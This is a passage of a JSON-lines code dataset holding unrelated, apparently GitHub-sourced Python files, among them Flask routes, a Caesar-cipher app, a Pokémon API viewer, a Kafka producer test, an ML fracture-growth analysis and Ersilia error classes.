\"article_assc\", \"/article//relationship/orderarticle\")#GET POST PATCH DELETE relationship\n\n# Order(1)\napi.route(OrderDetail,\"order_detail\",\"/order/\", \"/orderarticle//order\")# GET PATCH DELETE ORDER\napi.route(OrderList, \"order_list\",\"/order\",\"/user//order\",\"/articleorder//order\")## GET POST ORDER, POST ORDER =>USER\napi.route(OrderAsscArticleRelationship, \"order_assc\",\"/order//relationship/orderarticle\")#GET POST PATCH DELETE relationship\napi.route(OrderUserRelationship, \"order_user\",\"/order//relationship/user\")##GET POST PATCH DELETE relationship\n \n# Order_Article:\napi.route(OrderArticleDetail,\"orderarticle_detail\",\"/orderarticle/\")# GET PATCH DELETE ORDER_ARTICLE ASSOCIATION\n\napi.route(OrderArticleList, \"orderarticle_list\", \n \"/orderarticle\", \n \"/order//orderarticle\", \n \"/article//orderarticle\")##GET POST ARTICLE_ASSOCIATION, POST ORDER_ARTICLE => ORDER, POST ORDER_ARTICLE => ARTICLE\n\napi.route(OrderArticleArticleRelationship, \"orderarticle_article\", \"/orderarticle//relationship/article\")#GET POST PATCH DELETE relationship\n\napi.route(OrderArticleOrderRelatioship, \"orderarticle_order\", \"/orderarticle//relationship/order\")#GET POST PATCH DELETE relationship\n","repo_name":"ManuelSBZ/Api_Ecommerce","sub_path":"app/api_data_layer/api_v1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25653575939","text":"from flask import Flask, request\nfrom caesar import rotate_character, alphabet_position\napp = Flask(__name__)\napp.config['DEBUG'] = True\nheader=\"\"\"\n\n\n \n \n \n \"\"\"\nbody=\"\"\"\n
\n

\n Rotate by:\n \n

\n \n \n
\"\"\" \nfooter=\"\"\"\n\"\"\"\n\n@app.route(\"/\")\ndef index():\n new_str = \"\"\n return header + body.format(new_str) + footer\n \n@app.route(\"/\", methods=['POST'])\ndef encrypt():\n text = request.form['text']\n rot = int(request.form['rot'])\n new_str = \"\"\n for i in range(len(text)):\n if text[i].isalpha():\n new_str = new_str + rotate_character(text[i], rot)\n else:\n new_str = new_str + text[i]\n return header + body.format(new_str) + footer\n\napp.run()","repo_name":"Hugo-J-Hoffman/web-caesar_1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"731051428","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport time, datetime\nimport re\nimport sys\n\nimport shutil\nimport glob\nfrom pathlib import Path\nimport json\n\n\n# # Function\n\n# In[2]:\n\n\ndef createSidebar(projectName):\n newProject = projectName\n \n cwd = os.getcwd()\n templateSidebar = cwd + '\\\\_template\\\\template_sidebar.yml'\n dstFile = templateSidebar.replace('\\\\_template\\\\','\\\\_data\\\\sidebars\\\\').replace('template',newProject)\n \n srcFile = templateSidebar\n dstFile = templateSidebar.replace('\\\\_template\\\\','\\\\_data\\\\sidebars\\\\').replace('template',newProject)\n shutil.copy(srcFile, dstFile)\n \n with open(srcFile,'r', encoding=\"utf8\") as src:\n with open(dstFile,'w', encoding=\"utf8\") as dst:\n\n line = src.readline()\n\n while line:\n if 'template' in line:\n line = line.replace('template',newProject)\n\n dst.write(line) \n line = src.readline()\n \n print('Finished creating sidebar')\n\n\n# In[3]:\n\n\ndef createPosts(projectName):\n newProject = projectName\n \n cwd = os.getcwd()\n \n src = cwd + '\\\\_template\\\\templatePost\\\\'\n dst = cwd + '\\\\_posts\\\\'+newProject\n \n shutil.copytree(src, dst) \n \n print('Finished creating posts')\n\n\n# In[4]:\n\n\ndef createPages(projectName):\n newProject = projectName\n \n cwd = os.getcwd()\n \n srcFolder = cwd + '\\\\_template\\\\templatePages\\\\'\n dstFolder = cwd + '\\\\pages\\\\'+newProject + '\\\\'\n os.mkdir(dstFolder)\n \n onlyfiles = [f for f in listdir(srcFolder) if isfile(join(srcFolder, f))]\n \n for fileName in onlyfiles:\n with open(srcFolder+fileName,'r', encoding=\"utf8\") as src:\n with open(dstFolder+fileName.replace('template',newProject),'w', encoding=\"utf8\") as dst:\n line = src.readline()\n\n while line:\n if 'template' in line:\n line = line.replace('template',newProject)\n\n dst.write(line) \n line = src.readline() \n \n print('Finished creating pages')\n\n\n# In[5]:\n\n\ndef addToNav(projectName):\n newProject = projectName\n \n cwd = os.getcwd()\n \n navFile = cwd + '\\\\_data\\\\topnav.yml'\n\n with open(navFile,'a', encoding=\"utf8\") as nav:\n nav.write('\\n')\n nav.write(f\" - title: {newProject}\\n\")\n nav.write(f\" url: /{newProject}_intro.html\")\n \n print('Finished adding to topnav.html')\n\n\n# In[6]:\n\n\ndef main(projectName):\n createSidebar(projectName)\n createPosts(projectName)\n createPages(projectName)\n addToNav(projectName) \n\n\n# # Main\n\n# In[7]:\n\n\n#newProject = 'newProject'\n\n\n# In[8]:\n\n\n#main(newProject)\n\n\n# In[ ]:\n\n\nif __name__ == '__main__':\n argList = list(sys.argv)\n main(argList[1])\n\n","repo_name":"mgaringoDev/FaceChangeOnWord","sub_path":"docs/makeNewProject.py","file_name":"makeNewProject.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72080289707","text":"from random import seed\nfrom random import randint\n\n\ndef menuNovaInscricao(): # definindo funções para usar no menu principal\n nome = input(\"Digite seu nome: \")\n email = input(\"Digite email: \")\n telefone = input(\"Digite telefone: \")\n curso = input(\"Digite curso: \")\n seed(100)\n voucher = randint(100, 400)\n dicionario = {\n \"Voucher\": voucher,\n \"Nome\": nome,\n \"Email\": email,\n \"Telefone\": telefone,\n \"Curso\": curso\n }\n listaalunos.append(dicionario)\n\n\n\ndef menuVisualizaInscricao(lista):\n print(lista)\n\n\ndef menuPrincipal():\n op = True\n while (op):\n print(\"*********Menu*********\");\n menuop = int(input(\"1- Nova inscrição \\n2- Visualizar inscrição \\n0- Encerrar \\nOpção escolhida: \"));\n if menuop == 1:\n menuNovaInscricao()\n elif menuop == 2:\n if len(listaalunos) != 0:\n print(\"---------------Lista inscritos---------------\")\n menuVisualizaInscricao(listaalunos)\n print(\"---------------\")\n else:\n print(\"Nenhuma inscrição cadastrada\")\n elif menuop == 0:\n op = False;\n else:\n print(\"Erro: digite uma opção válida!\")\n\n\nlistaalunos = [] # variável global no prog principal\nmenuPrincipal();\n","repo_name":"deborahregina/trabalhofinalprogramacao1","sub_path":"questao4.py","file_name":"questao4.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41844513775","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.feature_selection import RFE\nfrom sklearn.feature_selection import RFECV\n\n#filen = 'txts/M8_2_track_params_cont.txt' \n#filen = 'txts/M8_track_params_cont.txt' \n#filen = 'txts/MONZ5_track_params_cont.txt' \nfilen = 'txts/WG04_track_params_cont.txt' \n\nitr = 5000 # number of iterations in solver\ntsi = 0.20 # test size\n\nscale = 1 # scale features\ncol_scale = ['min-dist', 'mean-dist',\n 'median-dist', 'mean-10_dist', 'median-10_dist', 'theta1', 'theta2',\n 'theta3', 'd1', 'd2', 'd3', 'aniso', 'elong', 'volume']\n\n# percentile of volume range\n# only from 10-100th percentile\nq=10\nq_next = 100\n \n# change in volume percentage\n#perc = 0.70;\nis_equal=1; # do or do not down sample to make equal categories\n#percs = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7]\npercs = [0.5]\nfor perc in percs:\n print(perc)\n txt_name = 'txts/score_EXP_p'+str(round(perc*100))+'_p'+str(q)+'_wEX_accur.txt'\n exp_str = filen.split('_')\n exp_str = exp_str[0]\n exp_s = exp_str[5:]\n if 'M8_2' in filen:\n exp_s = exp_s+'_2'\n \n txt_name = txt_name.replace('EXP', exp_s)\n \n # run model multiple times for different fracture populations\n \n recalls = []\n accurs = []\n precis = []\n rocs = []\n num_g1 = []\n num_g0 = []\n \n ranks = []\n rankscv = []\n qfeats = []\n witers = []\n featns = []\n coef_tot = []\n sig_tot = []\n scorcv = []\n selcv = []\n coeffs = []\n #statf = 'p tp tn fp fn TPR FPR \\n'\n \n it=0;\n maxi = 50;\n while itthr_high\n \n #ind_rem = list(compress(list_a, not(fil)))\n i=0 \n for bol1 in bool_1:\n bol2 = bool_2[i]\n if bol1 or bol2:\n remn= remn+1\n inds.append(i+i_c)\n \n i=i+1\n \n i_c=i_c+i\n \n df_thresh = df_thresh.drop(df_thresh.index[inds])\n df = df_thresh\n \n #q_prev = q\n # only consider fractures growing by X% of their volume\n # within certain %s\n df = df[abs(df[\"delvol\"])> perc*df[\"volume\"]]\n \n # count the number of true and faulse\n grow_bin = df[\"is_grow\"].values\n num_1 = len(grow_bin[grow_bin==1])\n num_0 = len(grow_bin[grow_bin==0])\n \n # randomly select subsets of growing fractures so ratio of num_0 and num_1= 1\n # find the index of values to drop, \n if is_equal and num_0 int:\n counter, set_counter = use_state(0)\n set_counter(counter + 1)\n return counter\n\n\nclass Bar:\n def __init__(self):\n self.counter = 0\n\n def python_state(self) -> int:\n self.counter += 1\n return self.counter\n\n\ndef test_local_state() -> None:\n python_state = Timer(Bar().python_state).repeat(repeat=100000, number=1)\n hooks_state = Timer(Foo().local_state).repeat(repeat=100000, number=1)\n python_state_median = median(python_state)\n hooks_state_median = median(hooks_state)\n\n overhead = hooks_state_median / python_state_median\n\n allowed_overhead: int = 30\n\n if overhead > allowed_overhead:\n with Profile() as profile:\n timeit(Foo().local_state, number=100000)\n (Stats(profile).strip_dirs().sort_stats(SortKey.TIME).print_stats())\n assert overhead < allowed_overhead, \"Performance is not good enough\"\n","repo_name":"amitassaraf/python-hooks","sub_path":"tests/test_hooks/test_performance.py","file_name":"test_performance.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"37"} +{"seq_id":"74464015786","text":"import json\n\nclass Config:\n def __init__(self):\n self.preview = True\n # self.enableSettings = False\n self.captureWindowName = \"ウィンドウ プロジェクタ\"\n self.showGrid = False\n self.showStencil = False\n self.xCoord = 0\n self.yCoord = 0\n self.width = 512\n self.height = 448\n self.enableSettingsExpert = False\n self.captureFPS = 60\n self.sendFPS = 5\n self.windowHandle = 0\n self.blackThreshold = 25\n self.inGameThreshold = 30000\n self.address = \"localhost:5041\"\n self.playerName = \"\"\n self.accessKey = \"\"\n\n def load(self):\n try:\n with open(\"config.json\", mode=\"r\") as f:\n hash = json.loads(f.read())\n def isValid(key, typ):\n return key in hash and type(hash[key]) == typ\n if isValid(\"preview\", bool): self.preview = hash[\"preview\"]\n # if isValid(\"enableSettings\", bool): self.enableSettings = hash[\"enableSettings\"]\n if isValid(\"captureWindowName\", str): self.captureWindowName = hash[\"captureWindowName\"]\n if isValid(\"showGrid\", bool): self.showGrid = hash[\"showGrid\"]\n if isValid(\"showStencil\", bool): self.showStencil = hash[\"showStencil\"]\n if isValid(\"xCoord\", int): self.xCoord = hash[\"xCoord\"]\n if isValid(\"yCoord\", int): self.yCoord = hash[\"yCoord\"]\n if isValid(\"width\", int): self.width = hash[\"width\"]\n if isValid(\"height\", int): self.height = hash[\"height\"]\n if isValid(\"enableSettingsExpert\", bool): self.enableSettingsExpert = hash[\"enableSettingsExpert\"]\n if isValid(\"captureFPS\", int): self.captureFPS = hash[\"captureFPS\"]\n if isValid(\"sendFPS\", int): self.sendFPS = hash[\"sendFPS\"]\n if isValid(\"windowHandle\", int): self.windowHandle = hash[\"windowHandle\"]\n if isValid(\"blackThreshold\", int): self.blackThreshold = hash[\"blackThreshold\"]\n if isValid(\"inGameThreshold\", int): self.inGameThreshold = hash[\"inGameThreshold\"]\n if isValid(\"address\", str): self.address = hash[\"address\"]\n if isValid(\"playerName\", str): self.playerName = hash[\"playerName\"]\n if isValid(\"accessKey\", str): self.accessKey = hash[\"accessKey\"]\n except:\n pass\n\n def save(self):\n try:\n with open(\"config.json\", mode=\"w\") as f:\n f.write(json.dumps({\n \"preview\": self.preview,\n # \"enableSettings\": self.enableSettings,\n \"captureWindowName\": self.captureWindowName,\n \"showGrid\": self.showGrid,\n \"showStencil\": self.showStencil,\n \"xCoord\": self.xCoord,\n \"yCoord\": self.yCoord,\n \"width\": self.width,\n \"height\": self.height,\n \"enableSettingsExpert\": self.enableSettingsExpert,\n \"captureFPS\": self.captureFPS,\n \"sendFPS\": self.sendFPS,\n \"windowHandle\": self.windowHandle,\n \"blackThreshold\": self.blackThreshold,\n \"inGameThreshold\": self.inGameThreshold,\n \"address\": self.address,\n \"playerName\": self.playerName,\n \"accessKey\": self.accessKey\n }))\n except:\n pass","repo_name":"NESTetrisJP/NESTrisOCR-CJL","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"43514901557","text":"from Tkinter import *\nimport tkFont\nimport webbrowser\nfrom flashcardstudy import help\n\ndef open_website(evt):\n webbrowser.open(r\"https://github.com/comatory/flashCardStudy\")\n\ndef open_twitter(evt):\n webbrowser.open(r\"https://twitter.com/ondrejsynacek\")\n\n\ndef about_window():\n about = Toplevel()\n data = help.author_data()\n\n about_frame = Frame(about)\n about_frame.grid(row=0, column=0, padx=20, pady=10)\n\n appname_label = Label(about_frame, text='flashCardStudy ' + 'v' + data['version'], font='-weight bold')\n appname_label.grid(row=0, column=0)\n\n authorname_label = Label(about_frame, text='programming: ' + data['devname'])\n authorname_label.grid(row=1, column=0)\n\n twitter_link_label = Label(about_frame, text=data['twitter'], font='-underline True')\n twitter_link_label.grid(row=2, column=0)\n twitter_link_label.bind('', open_twitter)\n\n website_link_label = Label(about_frame, text=data['web'], font='-underline True')\n website_link_label.grid(row=3, column=0)\n website_link_label.bind('', open_website)\n\n spacer = Label(about_frame)\n spacer.grid(row=4, column=0)\n\n thanks_label = Label(about_frame, text='Thanks to:')\n thanks_label.grid(row=5, column=0)\n\n thankers_label = Label(about_frame, text = data['thanks'])\n thankers_label.grid(row=6, column=0)\n\n close_button = Button(about_frame, text='Close', command=about.destroy)\n close_button.grid(row=7, column=0)\n \n \n","repo_name":"eltolis/flashCardStudy","sub_path":"gui/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3094197685","text":"from fastapi import FastAPI\r\n\r\nfrom src.api import collect_movies\r\nfrom src.containers import Container\r\n\r\n\r\ndef create_app():\r\n container = Container()\r\n container.wire(packages=[collect_movies])\r\n\r\n fastapi_app = FastAPI()\r\n fastapi_app.container = container\r\n fastapi_app.include_router(collect_movies.router, prefix=\"/api/v1\")\r\n return fastapi_app\r\n\r\n\r\napp = create_app()\r\n","repo_name":"chedv/content-aggregator","sub_path":"src/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73341578027","text":"from telegram import Update\nfrom telegram.ext import ContextTypes\n\nclass Filter:\n callback_query_pattern = None\n \"\"\"For making patterns more consistent\"\"\"\n\n def __init__(self, update: Update, context: ContextTypes.DEFAULT_TYPE, id: str, **kwargs) -> None:\n self.id = id\n self.text = kwargs.get('override_text', None) or self._get_filter(update, context)\n self.active = True\n self.subscribers = [update.effective_user.id]\n self.chat_id = update.effective_chat.id\n\n def _get_filter(self, update: Update, context: ContextTypes.DEFAULT_TYPE):\n try:\n filter_text = ' '.join(context.args)\n except (IndexError):\n update.effective_chat.send_message(\n \"You need to specify the type of message you want to message\")\n raise ValueError(\"Missing an argument for filter_text\")\n return filter_text\n\n def subscribe(self, update: Update):\n self.subscribers.append(update.effective_user.id)\n\n def toggle(self):\n self.active = not self.active\n\n def __repr__(self) -> str:\n if not self.active:\n return \"\"\n return f\"(filter_id) {self.id} : {self.text}\\n\"","repo_name":"belbcode/telegram-filter-bot","sub_path":"src/Utils/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20654826877","text":"# coding=utf-8\nimport requests\nfrom django.shortcuts import render, redirect\n#LISTAR\n\ndef listar_pokemon(request):\n url = 'https://pokeapi.co/api/v2/pokemon/?limit=9'\n offset = 0\n next = 1\n previus = -1\n\n if 'next' in request.GET:\n previus = int(request.GET.get('next'))-1\n next = int (request.GET.get('next'))+1\n offset = int(request.GET.get('next'))*9\n\n if 'previus' in request.GET:\n previus = int(request.GET.get('previus'))-1\n offset = int(request.GET.get('previus'))*9\n\n args = {'offset':offset} if offset else {}\n response = requests.get(url, params=args)\n if response.status_code == 200:\n payload = response.json()\n result = payload.get('results', [])\n if result:\n pokemonS = []\n for pokemon in result:\n nombre = pokemon['name']\n response = requests.get(pokemon['url'])\n if response.status_code == 200:\n payload = response.json()\n pokemon_id = payload.get('id', [])\n img = payload.get('sprites', [])\n imagen = img['other']\n dir = {'nombre': nombre, 'id': pokemon_id, 'imagen': imagen}\n pokemonS.append(dir)\n return render(request, 'templates/listar_pokemon.html', {'pokemonS':pokemonS, 'next':next, 'previus':previus})\n\ndef tipo(request, id_tipo):\n id = id_tipo\n url = 'https://pokeapi.co/api/v2/type/'+str(id)\n response = requests.get(url)\n if response.status_code == 200:\n payload = response.json()\n pokemon_id = payload.get('id', [])\n pokemon_name = payload.get('pokemon', [])\n tipo_name = payload.get('name')\n pokemonS = []\n for pokemon in pokemon_name:\n links = pokemon['pokemon']\n response = requests.get(links['url'])\n if response.status_code == 200:\n payload = response.json()\n pokemon_id = payload.get('id', [])\n nombre = payload.get('name', [])\n img = payload.get('sprites', [])\n imagen = img['other']\n dir = {'id': pokemon_id, 'imagen': imagen, 'nombre':nombre}\n pokemonS.append(dir)\n return render(request, 'templates/base/pokemon_tipo.html', {'pokemonS':pokemonS, 'tipo_name':tipo_name})\n\n\ndef getInfoPokemon(request, id_pokemon):\n id = id_pokemon\n url = 'https://pokeapi.co/api/v2/pokemon/'+str(id)\n response = requests.get(url)\n if response.status_code == 200:\n payload = response.json()\n nombre = payload.get('name', [])\n img = payload.get('sprites', [])\n imagen = img['other']\n peso = payload.get('weight', [])\n altura = payload.get('height', [])\n habilidad = payload.get('abilities', [])\n tipo = payload.get('types', [])\n movimiento = payload.get('moves', [])\n\n if tipo:\n pokemonS = []\n for pokemon in tipo:\n pokemonUrl = pokemon['type']\n response = requests.get(pokemonUrl['url'])\n if response.status_code == 200:\n payload = response.json()\n id_tipo = payload.get('id', [])\n nombre_tipo = payload.get('name', [])\n dir = {'id':id_tipo, 'nombre':nombre_tipo}\n pokemonS.append(dir)\n\n diccionario = {'nombre':nombre, 'imagen':imagen, 'peso':peso, 'altura':altura}\n\n return render(request, 'templates/pokemon_info.html', {'pokemon':diccionario, 'habilidad':habilidad, 'tipo':tipo, 'movimiento':movimiento, 'pokemonUrl':id_tipo, 'pokemonS':pokemonS})\n\ndef tiposPokemon(request):\n url = 'https://pokeapi.co/api/v2/type/'\n response = requests.get(url)\n if response.status_code == 200:\n payload = response.json()\n result = payload.get('results', [])\n if result:\n pokemonS = []\n for pokemon in result:\n nombre = pokemon['name']\n response = requests.get(pokemon['url'])\n if response.status_code == 200:\n payload = response.json()\n id = payload.get('id', [])\n tipo = pokemon.get('name', [])\n dir = {'tipo': tipo, 'id':id}\n pokemonS.append(dir)\n\n return render(request, 'templates/select_tipo.html', {'id':id, 'pokemonS':pokemonS})","repo_name":"danielh-wh/pokemon-api","sub_path":"app/pokemones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21601712260","text":"import datetime\n\nfrom confluent_kafka import Consumer, KafkaException, KafkaError\nfrom confluent_kafka import Producer\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroDeserializer, AvroSerializer\nfrom confluent_kafka.serialization import StringSerializer, SerializationContext, MessageField\n\nfrom Module.Authentication import Authentication, auth_to_dict, dct_to_auth\nfrom pymongo import MongoClient\nfrom SendEmail import send_email\nimport random\nimport sys\nimport json\n\n# Define Topics and Config\ntopic_user_authentication_result = 'upwork_user_authentication_result'\nbootstrap_servers = 'localhost:39092,localhost:39093,localhost:39094'\nsr_config = {\n 'url': 'http://localhost:8282'\n}\n\n# Define Kafka Deserializer and Schema\nschema_registry_client = SchemaRegistryClient(sr_config)\nauth_schema = schema_registry_client.get_latest_version(\"upwork_user_auth\")\nauth_avro_serializer = AvroSerializer(schema_registry_client,\n auth_schema.schema.schema_str,\n auth_to_dict)\n\n\ndef define_kafka_producer():\n kraft_config = {\n 'bootstrap.servers': bootstrap_servers,\n }\n producer = Producer(kraft_config)\n return producer\n\n\ndef delivery_report(err, event):\n if err is not None:\n print(f\"Error ID: {event.key().decode('utf8')}: {err}\")\n else:\n print(f\"Success: {event.key().decode('utf8')}\")\n\n\ndef send_producer(topic, key_value, object_data, producer, avro_serializer):\n producer.produce(topic=topic,\n key=StringSerializer('utf_8')(key_value),\n value=avro_serializer(object_data, SerializationContext(topic, MessageField.VALUE)),\n on_delivery=delivery_report)\n producer.flush()\n\n\ni = 0\nwhile i <= 5:\n i = i + 1\n dateFormat = '%Y%m%d'\n timeFormat = '%H%M%S'\n current_date = datetime.datetime.now().strftime(dateFormat)\n current_time = datetime.datetime.now().strftime(timeFormat)\n producer = define_kafka_producer()\n new_auth_otp = Authentication(\"Test123\", \"Test@mail.com\", current_date, current_time, \"\", \"statusss\")\n send_producer(topic_user_authentication_result, \"Test123\", new_auth_otp, producer, auth_avro_serializer)\n","repo_name":"dmitrimahayana/Data-Engineering","sub_path":"Py-Kafka-SASL/Test2.py","file_name":"Test2.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3262631877","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport argparse\nimport sys, os\n\nif __name__ == \"__main__\":\n\n d = \"\"\"\"\"\"\n parser = argparse.ArgumentParser(description=d)\n parser.add_argument(\"-fn\", type=str, nargs=\"+\",\n help=\"Input. The log files from TF.\")\n parser.add_argument(\"-patience\", default=40, type=int,\n help=\"Input. The patience for early stopping.\")\n parser.add_argument(\"-epochs\", type=int, default=200,\n help=\"Input. The number of epochs in training. \")\n parser.add_argument(\"-filters\", type=str, default=\"128+64+32\")\n args = parser.parse_args()\n\n EPOCHS = args.epochs\n p = args.patience + 1\n\n fn_list = args.fn\n for i, fn in enumerate(fn_list):\n if i == 0 :\n print(\"Pooling Batch Dropout Alpha filters Loss(T) RMSE(T) PCC(T) Loss(V) RMSE(V) PCC(V)\")\n\n if not os.path.exists(fn):\n print(\"TF log file %s not exists. \"%fn)\n #sys.exit(0)\n else:\n df = pd.read_csv(fn, header=0, index_col=0)\n\n batch = fn.split(\"batch\")[1].split(\"_\")[0]\n dropout = fn.split(\"dropout\")[1].split(\"_\")[0]\n alpha = fn.split(\"alpha\")[1][:3]\n if \"with\" in fn:\n pooling = \"yes\"\n else:\n pooling = \"no\"\n\n if df.index.values[-1] == EPOCHS or df.shape[0] < args.patience + 1:\n print(fn, \"Model training per-terminated before a final solution fixed. \")\n #sys.exit(0)\n else:\n to_print = \"%24s, %6s, %6s, %6s, %6s, %12s,\" % (fn, pooling, batch, dropout, alpha, args.filters)\n #dat = df.iloc[-1*patience, :]\n to_print += \"%8.4f,%8.4f,%8.4f,%8.4f,%8.4f, %8.4f\" %(df['loss'].values[-p], df['rmse_train'].values[-p], df['pcc_train'].values[-p],\n df['loss_val'].values[-p], df['rmse_val'].values[-p], df['pcc_val'].values[-p])\n\n print(to_print)\n\n","repo_name":"zhenglz/deepunion","sub_path":"deepunion/test/getDNNresults.py","file_name":"getDNNresults.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"10316785818","text":"\"\"\" Python file related to Pop Up Message in UI \"\"\"\nfrom PageObjectLibrary import PageObject\nfrom robot.api.deco import keyword\nfrom resources.Common import Common\n\n\nclass PopUpMsg(PageObject):\n \"\"\" Functions related to Pop Up Message in UI \"\"\"\n\n @keyword(\"validate pop up message shows '${msg}'\")\n def validate_pop_up_msg(self, msg):\n \"\"\" Functions to validate pop up message returned \"\"\"\n self.selib.wait_until_page_does_not_contain_element(\"//div[@class='loading-text']//img\")\n try:\n self.selib.wait_until_element_is_visible('//core-notification-message//div[@class=\"popup-message\"]')\n msg_return = self.selib.get_text('//core-notification-message//div[@class=\"popup-message\"]')\n except Exception as e:\n print(e.__class__, \"occured\")\n self.selib.wait_until_element_is_visible('//core-notification-confirm//div[@class=\"ant-modal-confirm-body\"]')\n msg_return = self.selib.get_text('//core-notification-confirm//div[@class=\"ant-modal-confirm-body\"]')\n\n self.builtin.should_contain(msg_return, msg)\n\n def validate_pop_up_message(self, msg):\n self.selib.wait_until_element_is_visible('//nz-message-container//child::span')\n msg_return = self.selib.get_text('//nz-message-container//child::span')\n self.builtin.should_contain(msg_return, msg)\n\n @keyword(\"confirm pop up message\")\n def click_button_on_pop_up_msg(self):\n \"\"\" Functions to click Ok button on pop up shown \"\"\"\n Common().wait_keyword_success(\"click_element\", \"//core-notification-message//button\")\n\n def insert_into_field_in_pop_up(self, label, item):\n \"\"\" Functions to insert text in inline search pop up \"\"\"\n self.selib.input_text(\"//*[contains(text(),'{0}')]/following::input[1]\".format(label), item)\n\n def insert_into_field_in_filter_pop_up(self, label, item):\n \"\"\" Functions to insert text in filter pop up \"\"\"\n self.selib.input_text(\"//core-search-panel//*[contains(text(),'{0}')]/following::input[1]\".format(label), item)\n","repo_name":"ronnyling/rckl-llt.github.io","sub_path":"Lelongtips/sherlock-dms/resources/components/PopUpMsg.py","file_name":"PopUpMsg.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40381715915","text":"\"\"\"\nFASTQ formatter\n\"\"\"\nclass FASTQFormatter(object):\n \"\"\"Formatter for FASTQ files\"\"\"\n def __init__(self, theme):\n \"\"\"Creates a new FASTQFormatter instance\"\"\"\n import os\n from cats.styles.sequence import SequenceFormatter\n\n # Load sequence formatter\n self.seq_formatter = SequenceFormatter(theme)\n\n def format(self, inbuffer, outbuffer=None, **kwargs):\n \"\"\"Format sequence records\"\"\"\n import sys\n\n # default/bold text\n RESET = '\\033[0m'\n BOLD = '\\033[1m'\n\n # default to STDOUT for output\n if outbuffer is None:\n outbuffer = sys.stdout\n\n # FASTQ line types\n FASTQ_ID = 0\n FASTQ_SEQ = 1\n FASTQ_DESC = 2\n FASTQ_QUAL = 3\n\n # Iterate through and format each sequence record\n if kwargs['color']:\n for i, line in enumerate(inbuffer):\n # Reset formatting\n outbuffer.write(RESET)\n\n # line = line.decode('ascii')\n line = line.decode()\n\n # Print description\n if i % 4 == FASTQ_ID:\n outbuffer.write(BOLD + line)\n elif i % 4 == FASTQ_SEQ:\n outbuffer.write(self.seq_formatter.format_nucleic_acid(line,\n kwargs['stop_codons'],\n kwargs['cpg']))\n else:\n outbuffer.write(line)\n else:\n for line in inbuffer:\n outbuffer.write(line.decode())\n\nclass UnrecognizedInput(IOError):\n \"\"\"Unrecognized input error\"\"\"\n pass\n","repo_name":"khughitt/cats","sub_path":"cats/formatters/fastq.py","file_name":"fastq.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"37424338149","text":"from ... import ErsiliaBase\nimport os\nimport tempfile\nfrom ...utils.terminal import run_command\n\n\nclass ErsiliaError(Exception):\n \"\"\"Base class for managing errors in Ersilia\"\"\"\n\n def __init__(\n self, message=\"Ersilia has experienced an error\", hints=\"\", config_json=None\n ):\n text = \"Ersilia exception class:\\n\"\n text += \"{}\\n\\n\".format(type(self).__name__)\n text += \"Detailed error:\\n\"\n text += message\n text += \"\\n\\n\"\n if hints:\n text += \"Hints:\\n\"\n text += hints\n text += \"\\n\"\n eb = ErsiliaBase(config_json=config_json, credentials_json=None)\n eb.logger.error(text)\n Exception.__init__(self, text)\n\n\nclass MissingDependencyError(ErsiliaError):\n def __init__(self, dependency):\n self.dependency = dependency\n self.message = \"Missing dependency {0}\".format(self.dependency)\n self.hints = \"\"\n ErsiliaError.__init__(self, self.message, self.hints)\n\n\nclass NullModelIdentifierError(ErsiliaError):\n def __init__(self, model):\n self.model = model\n self.message = \"Model identifier {0} is null\".format(self.model)\n self.hints = \"This type of error typically occurs when a model has not been served. Please run 'ersilia serve MODEL_ID' if you have a model identifier in mind\"\n ErsiliaError.__init__(self, self.message, self.hints)\n\n\nclass InvalidModelIdentifierError(ErsiliaError):\n def __init__(self, model):\n self.model = model\n self.message = \"Could not identify model identifier or slug: {0}:\".format(\n self.model\n )\n self.hints = \"Please check that {0} exists in the Ersilia Model Hub:\\n - https://ersilia.io/model-hub (for approved models)\\n - https://airtable.com/shrUcrUnd7jB9ChZV (for approved and in preparation models)\".format(\n self.model\n )\n 